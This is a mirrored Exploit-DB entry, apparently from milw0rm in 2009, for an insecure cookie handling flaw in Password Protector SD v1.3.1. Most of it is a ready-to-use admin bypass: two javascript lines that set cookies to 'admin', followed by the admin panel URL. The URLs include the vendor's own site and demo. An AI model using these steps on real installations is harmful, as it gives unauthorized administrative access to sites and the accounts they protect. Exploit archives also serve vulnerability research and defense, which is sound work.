bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8668.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

38 lines
No EOL
1.1 KiB
Text
Raw Blame History

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script : Password Protector SD v1.3.1 Insecure Cookie Handling Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
--------
step 1 [add]: javascript:document.cookie="c7portal=admin;path=/";
step 2 [add]: javascript:document.cookie="cookname=admin;path=/";
step 3 [to login] : http://localhost/cgi-bin/ppSD/admin.pl?L=home
in control panel :
http://www.passwordprotectorsd.com/cgi-bin/ppSD/admin.pl?L=home
demo:
-----
http://www.passwordprotectorsd.com/cgi-bin/c7/admin.pl
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
ThE g0bL!N - spyboy - red virus - virus_hima - Red-D3v1L
Cyb3r-DeViL- OXIDE
all my Friends
# milw0rm.com [2009-05-13]
Reference in a new issue View git blame Copy permalink